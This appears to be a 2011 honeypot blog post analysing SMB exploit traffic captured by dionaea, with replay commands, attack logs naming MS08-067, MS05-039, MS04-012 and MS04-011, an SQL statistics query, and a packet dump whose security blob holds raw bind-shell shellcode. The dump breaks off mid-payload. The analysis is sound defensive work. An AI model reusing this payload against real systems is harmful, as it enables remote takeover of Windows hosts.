You are here: start » 2011 » 04 » 19 » rumors

rumors

... and beer improves your driving skills!
Twitter is key to spread rumors, nobody even asks for proof1).

Given the current rumors about MS11-0202) exploit code and malware in the wild, I've had a look on the ore.

attention please

While I could not confirm the rumors, I've found something of interest and asked the ml for assistance.
The usual suspect turned in bistreams, and as the hosts in question hat many different bistreams on the day of the interesting attack pattern I received even way more streams than I asked for. Now, I did not know which bistream was the interesting one I was looking for, so I replayed all streams in a row. 

for i in /tmp/dionaea-lcreat-bistreams-daten/markus/smbd-445-65.79.250.71-*; do 
    echo $(date) $i; ./retry.py -f $i -H localhost -p 445 -rs >/dev/null; 
done
Tue Apr 19 18:29:40 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-2xsFlv
...
Tue Apr 19 18:31:54 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-qV3cF0
...
Tue Apr 19 18:34:32 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-zSGWuU

and checked the resulting attacks using readlogsql once this was done: 

/opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite -t $(date +"%s")-1*3600
using database located at /opt/dionaea/var/dionaea/logsql.sqlite
2011-04-19 18:29:40
  connection 1532 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47853 (1532 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:29:47
  connection 1533 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47858 (1533 None)
2011-04-19 18:29:51
  connection 1534 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47861 (1534 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:29:59
  connection 1535 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47866 (1535 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:30:07
  connection 1536 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33278 (1536 None)
    connection 1537 emulation tcp listen 0.0.0.0:9988 (1536 1536)
2011-04-19 18:30:09
  connection 1538 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33281 (1538 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:30:16
  connection 1539 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33286 (1539 None)
2011-04-19 18:30:20
  connection 1540 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33289 (1540 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:30:27
  connection 1541 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33294 (1541 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2011-04-19 18:30:34
  connection 1542 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33299 (1542 None)
2011-04-19 18:30:36
  connection 1543 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33302 (1543 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
    connection 1544 emulation tcp listen 0.0.0.0:9988 (1543 1543)
2011-04-19 18:30:43
  connection 1545 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33307 (1545 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:30:49
  connection 1546 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33310 (1546 None)
2011-04-19 18:30:52
  connection 1547 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33311 (1547 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2011-04-19 18:30:58
  connection 1548 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33315 (1548 None)
2011-04-19 18:31:03
  connection 1549 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33316 (1549 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:31:09
  connection 1550 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33319 (1550 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
    connection 1551 emulation tcp listen 0.0.0.0:9988 (1550 1550)
2011-04-19 18:31:20
  connection 1552 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33328 (1552 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:31:27
  connection 1553 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33334 (1553 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
2011-04-19 18:31:39
  connection 1554 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33341 (1554 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
2011-04-19 18:31:52
  connection 1555 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33342 (1555 None)
    connection 1556 emulation tcp listen 0.0.0.0:9988 (1555 1555)
2011-04-19 18:31:54
  connection 1557 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33343 (1557 None)
   profile: [{'return': '4711', 'args': ['.exe', '6'], 'call': '_lcreat'}, {'return': '0x71a10000', 'args': ['ws2_32.dll'], 'call': 'LoadLibraryA'}, {'return': '65', 'args': ['2', '1', '6'], 'call': 'socket'}, {'return': '0', 'args': ['65', {'sin_port': '9988', 'sin_addr': {'s_addr': '0.0.0.0'}, 'sin_zero': '       ', 'sin_family': '2'}, '16'], 'call': 'bind'}, {'return': '0', 'args': ['65', '16'], 'call': 'listen'}, {'return': '68', 'args': ['65', {}, ''], 'call': 'accept'}]
   profile: []
2011-04-19 18:31:56
  connection 1558 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33344 (1558 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
2011-04-19 18:32:08
  connection 1559 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33345 (1559 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:32:15
  connection 1560 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33346 (1560 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
2011-04-19 18:32:27
  connection 1561 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33347 (1561 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
    connection 1562 emulation tcp listen 0.0.0.0:9988 (1561 1561)
2011-04-19 18:32:39
  connection 1563 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33348 (1563 None)
2011-04-19 18:32:44
  connection 1564 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33349 (1564 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
2011-04-19 18:32:56
  connection 1565 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33350 (1565 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:33:04
  connection 1566 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33352 (1566 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
    connection 1567 emulation tcp listen 0.0.0.0:9988 (1566 1566)
2011-04-19 18:33:11
  connection 1568 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33353 (1568 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:33:17
  connection 1569 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33354 (1569 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2011-04-19 18:33:24
  connection 1570 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33355 (1570 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:33:30
  connection 1571 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33356 (1571 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
2011-04-19 18:33:43
  connection 1572 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33357 (1572 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
    connection 1573 emulation tcp listen 0.0.0.0:9988 (1572 1572)
2011-04-19 18:33:55
  connection 1574 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33359 (1574 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:34:03
  connection 1575 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33360 (1575 None)
2011-04-19 18:34:07
  connection 1576 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33361 (1576 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
2011-04-19 18:34:19
  connection 1577 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33362 (1577 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
    connection 1578 emulation tcp listen 0.0.0.0:9988 (1577 1577)
2011-04-19 18:34:32
  connection 1579 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33363 (1579 None)

So I decided to query sqlite for some statistics regarding the attacks 

SELECT
	COUNT(DISTINCT connections.connection),
	dcerpcserviceop_vuln,
	dcerpcservice_name,
	dcerpcserviceop_name
FROM
	connections
	JOIN dcerpcbinds
	NATURAL JOIN dcerpcrequests
	JOIN dcerpcservices ON(dcerpcservice_uuid = dcerpcbind_uuid)
	JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcservice = dcerpcservices.dcerpcservice AND dcerpcserviceop_opnum = dcerpcrequest_opnum) 
	WHERE connections.connection >= 1532
GROUP BY
	dcerpcservice_name,
	dcerpcserviceop_name
ORDER BY 
	dcerpcserviceop_vuln DESC,
	COUNT(DISTINCT connections.connection) DESC
#vulnServiceCall
5MS08-67SRVSVCNetPathCanonicalize
4MS05-39PNPPNP_QueryResConfList
4MS04-12ISystemActivatorRemoteCreateInstance
3MS04-11DSSETUPDsRolerUpgradeDownlevelServer
9lsarpcClose
9spoolssEnumPrinters
4lsarpcOpenPolicy

The remote host definitely wanted to us to join his army, using 4 different exploits, multiple sessions per exploit, and even multiple exploits per session. 

2011-04-19 18:32:27
  connection 1561 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33347 (1561 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))

This is called Double-Tap3).

Spotting the attack we were interested in 

2011-04-19 18:31:54
  connection 1557 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33343 (1557 None)
   profile: [{'return': '4711', 'args': ['.exe', '6'], 'call': '_lcreat'}, {'return': '0x71a10000', 'args': ['ws2_32.dll'], 'call': 'LoadLibraryA'}, {'return': '65', 'args': ['2', '1', '6'], 'call': 'socket'}, {'return': '0', 'args': ['65', {'sin_port': '9988', 'sin_addr': {'s_addr': '0.0.0.0'}, 'sin_zero': '       ', 'sin_family': '2'}, '16'], 'call': 'bind'}, {'return': '0', 'args': ['65', '16'], 'call': 'listen'}, {'return': '68', 'args': ['65', {}, ''], 'call': 'accept'}]
   profile: []

taking the timestamp and getting the proper bistream: 

Tue Apr 19 18:31:54 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-qV3cF0

Replaying this attack reveals this Packet (in the debug-logs): 

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 4287            sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Command             = SMB_COM_SESSION_SETUP_ANDX sizeof(  1) off=  4 goff=  8
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = CASES_ENSITIVITY+CANONICAL_PATHNAMES sizeof(  1) off=  9 goff= 13
     Flags2              = KNOWS_LONG_NAMES+KNOWS_EAS+SECURITY_SIGNATURE+EXT_SEC sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 0               sizeof(  2) off= 24 goff= 28
     PID                 = 14592           sizeof(  2) off= 26 goff= 30
     UID                 = 0               sizeof(  2) off= 28 goff= 32
     MID                 = 0               sizeof(  2) off= 30 goff= 34
###[ SMB Sessionsetup ESEC AndX Request sizeof(4249) ]### 
        WordCount           = 12              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        AndXReserved        = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        MaxBufferSize       = 4356            sizeof(  2) off=  5 goff= 41
        MaxMPXCount         = 10              sizeof(  2) off=  7 goff= 43
        VCNumber            = 0               sizeof(  2) off=  9 goff= 45
        SessionKey          = 0               sizeof(  4) off= 11 goff= 47
        SecurityBlobLength  = 4222            sizeof(  2) off= 15 goff= 51
        Reserved            = 0               sizeof(  4) off= 17 goff= 53
        Capabilties         = UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS+EXTENDED_SECURITY sizeof(  4) off= 21 goff= 57
        ByteCount           = 4222            sizeof(  2) off= 25 goff= 61
        SecurityBlob        = b'`\x82\x10z\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\x10n0\x82\x10j\xa1\x82\x10f#\x82\x10b\x03\x82\x04\x01\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x03\x00#\x82\x0cW\x03\x82\x04\n\x00\x90B\x90B\x90B\x90B\x81\xc4\xff\xef\xff\xffD\xeb\x02\xebk\xe8\xf9\xff\xff\xffSUVW\x8bl$\x18\x8bE<\x8bT(x\x03\xd5\x8bJ\x18\x8bZ \x03\xdd\xe32I\x8b4\x8b\x03\xf53\xff\xfc3\xc0\xac8\xe0t\x07\xc1\xcf\r\x03\xf8\xeb\xf2;|$\x14u\xe1\x8bZ$\x03\xddf\x8b\x0cK\x8bZ\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x023\xc0_^][\x89D$\x04\x8b\x04$\x89D$\x08\x8bD$\x04\x83\xc4\x08\xc3^j0Yd\x8b\x19\x8b[\x0c\x8b[\x1c\x8b\x1b\x8b{\x08\x83\xec\x1c\x8b\xec3\xc0Ph.exe\x89e\x14Wh\xeaI\x8a\xe8\xff\xd6j\x06\xffu\x14\xff\xd0\x89E\x04Wh\xdb\x8a#\xe9\xff\xd6\x89E\x0cWh\x8eN\x0e\xec\xff\xd63\xc9f\xb9llQh32.dhws2_T\xff\xd0\x8b\xd8Sh\xb6\x19\x18\xe7\xff\xd6\x89E\x10Sh\xe7y\xc6y\xff\xd6\x89E\x18Shn\x0b/I\xff\xd6j\x06j\x01j\x02\xff\xd0\x89E\x083\xc0PPP\xb8\x02\xff\'\x04\x80\xf4\xffP\x8b\xc4j\x10P\xffu\x08Sh\xa4\x1ap\xc7\xff\xd6\xff\xd0XSh\xa4\xad.\xe9\xff\xd6j\x10\xffu\x08\xff\xd03\xc0PP\xffu\x08Sh\xe5I\x86I\xff\xd6\xff\xd0\x8bM\x08\x89E\x08Q\xffU\x18\x81\xc4\xfc\xfe\xff\xff\x8b\xdc3\xc9Q\xb1\xffQS\xffu\x08\xffU\x10\x85\xc0~\nPS\xffu\x04\xffU\x0c\xeb\xe5\xffu\x08\xffU\x18Wh[L\x1a\xdd\xff\xd6\xffu\x04\xff\xd03\xc0P\xffu\x14Wh\x98\xfe\x8a\x0e\xff\xd6\xff\xd0Wh\xef\xce\xe0`\xff\xd6\xff\xd0UBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#\n\x03\x08\x00\xf8\x0f\x01\x00\xf8\x0f\x01#\x82\x089\x03\x82\x04\x11\x00CCCC \xf0\xfd\x7fSVWf\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff6h\t\x12\xd6c\xe8\xf7\x00\x00\x00\x89F\x08\xe8\xa2\x00\x00\x00\xffv\x04hk\xd0+\xca\xe8\xe2\x00\x00\x00\x89F\x0c\xe8?\x00\x00\x00\xffv\x04h\xfa\x97\x02L\xe8\xcd\x00\x00\x001\xdbh\x10\x04\x00\x00S\xff\xd0\x89\xc3V\x8bv\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4^1\xc0PPPSPP\xffV\x0c\x8bF\x08f\x81\xc4\x80\x00_^[\xff\xe0`\xe8#\x00\x00\x00\x8bD$\x0c\x8dX|\x83C<\x05\x81C(\x00\x10\x00\x00\x81c(\x00\xf0\xff\xff\x8b\x04$\x83\xc4\x14P1\xc0\xc31\xd2d\xff2d\x89"1\xdb\xb8\x90B\x90B1\xc9\xb1\x02\x89\xdf\xf3\xaft\x03C\xeb\xf3\x89~\x10d\x8f\x02Xa\xc3`\xbf \xf0\xfd\x7f\x8b\x1f\x8bF\x08\x89\x07\x8b\x7f\xf8\x81\xc7x\x01\x00\x00\x89\xf99\x19t\x04\x8b\t\xeb\xf8\x89\xfa9Z\x04t\x05\x8bR\x04\xeb\xf6\x89\x11\x89J\x04\xc6C\xfd\x01a\xc3\xa1\x0c\xf0\xfd\x7f\x8b@\x1c\x8bX\x08\x89\x1e\x8b\x00\x8b@\x08\x89F\x04\xc3`\x8bl$(\x8bE<\x8bT\x05x\x01\xea\x8bJ\x18\x8bZ 